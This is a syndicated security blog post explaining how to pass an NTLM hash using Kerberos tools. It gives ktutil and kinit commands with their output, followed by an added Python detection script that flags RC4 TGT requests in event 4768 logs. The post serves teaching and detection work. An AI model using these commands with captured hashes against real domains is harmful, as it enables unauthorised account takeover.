
Pass the Hash with Kerberos

This blog post may be of limited use: most of the time that you have an NTLM hash, you also have the tools to use it. But if you find yourself in a situation where you don’t have those tools and do have Kerberos tools, you can pass the hash with them.

Let’s say we have the NTLM hash for the user uberuser and the hash is 88e4d9fabaecf3dec18dd80905521b29. The first step is to create a keytab file using ktutil:

root@wpad:~# ktutil

At the ktutil prompt, type in the “add entry” (addent) command with the “principal” (-p) flag. Specify the user and an all-uppercase version of the FQDN. Next comes the “KVNO” (-k 1), which is the key version number. Finally, give the encryption type, which is rc4-hmac for NTLM hashes:

ktutil: addent -p [email protected] -k 1 -key -e rc4-hmac

After you hit enter you’ll get prompted for the rc4-hmac (NTLM) hash:

Key for [email protected] (hex): 88e4d9fabaecf3dec18dd80905521b29

Then we write the keytab file to disk and exit ktutil:

ktutil: wkt /tmp/a.keytab
ktutil: exit

The last step before we can use our authentication is to create a Kerberos ticket using our keytab file:

root@wpad:~# kinit -V -k -t /tmp/a.keytab -f [email protected]
Using default cache: /tmp/krb5cc_0
Using principal: [email protected]
Using keytab: /tmp/a.keytab
Authenticated to Kerberos v5

Validate it with klist:

root@wpad:~# klist
Ticket cache: FILE:/tmp/krb5cc_0
Default principal: [email protected]

Valid starting       Expires              Service principal
07/22/2018 21:38:43  07/23/2018 07:38:43  krbtgt/[email protected]
	renew until 07/23/2018 21:38:40
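
On the domain controller, TGT requests like the kinit above are logged as Security event 4768, and its TicketEncryptionType field records the encryption type (0x17 is rc4-hmac). The detection logic below is an added example, not part of the original post: it flags RC4 TGT requests and marks the ones from accounts that otherwise use AES. The JSON-lines export format and every sample event are constructed assumptions.

```python
import json
from collections import defaultdict

RC4_HMAC = 0x17                 # etype 23, the type requested on this page
AES_ETYPES = {0x11, 0x12}       # aes128 / aes256-cts-hmac-sha1-96

# Constructed sample: event 4768 records exported as JSON lines (assumed format).
SAMPLE_EVENTS = """\
{"EventID": 4768, "TimeCreated": "2018-07-22T09:01:12Z", "TargetUserName": "uberuser", "IpAddress": "::ffff:10.0.0.15", "TicketEncryptionType": "0x12", "Status": "0x0"}
{"EventID": 4768, "TimeCreated": "2018-07-22T09:03:40Z", "TargetUserName": "svc_legacy", "IpAddress": "::ffff:10.0.0.30", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TimeCreated": "2018-07-22T21:38:43Z", "TargetUserName": "uberuser", "IpAddress": "::ffff:10.0.0.99", "TicketEncryptionType": "0x17", "Status": "0x0"}
{"EventID": 4768, "TimeCreated": "2018-07-22T21:40:02Z", "TargetUserName": "bob", "IpAddress": "::ffff:10.0.0.44", "TicketEncryptionType": "0xFFFFFFFF", "Status": "0x18"}
{"EventID": 4624, "TimeCreated": "2018-07-22T21:41:00Z", "TargetUserName": "uberuser", "IpAddress": "10.0.0.15"}
"""

def parse_tgt_events(text):
    """Yield successful 4768 (TGT issued) events with the etype as an int."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 4768 or int(ev.get("Status", "0x1"), 16) != 0:
            continue                      # other event IDs and failed requests
        ev["etype"] = int(ev["TicketEncryptionType"], 16)
        yield ev

def find_rc4_tgt_requests(text):
    """Return RC4 TGT requests; 'downgrade' if the account also uses AES."""
    events = list(parse_tgt_events(text))
    seen = defaultdict(set)               # account -> etypes observed
    for ev in events:
        seen[ev["TargetUserName"].lower()].add(ev["etype"])
    findings = []
    for ev in events:
        user = ev["TargetUserName"].lower()
        if ev["etype"] != RC4_HMAC:
            continue
        kind = "downgrade" if seen[user] & AES_ETYPES else "rc4-only"
        findings.append((ev["TimeCreated"], user, ev["IpAddress"], kind))
    return findings

if __name__ == "__main__":
    for finding in find_rc4_tgt_requests(SAMPLE_EVENTS):
        print(*finding, sep="  ")
```

Accounts reported as "rc4-only" are worth checking against the list of services that still legitimately need RC4 before being treated as findings.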

*** This is a Security Bloggers Network syndicated blog from malicious.link authored by Malicious Link. Read the original post at: http://feedproxy.google.com/~r/Room362com/~3/e_oUMV65xEQ/
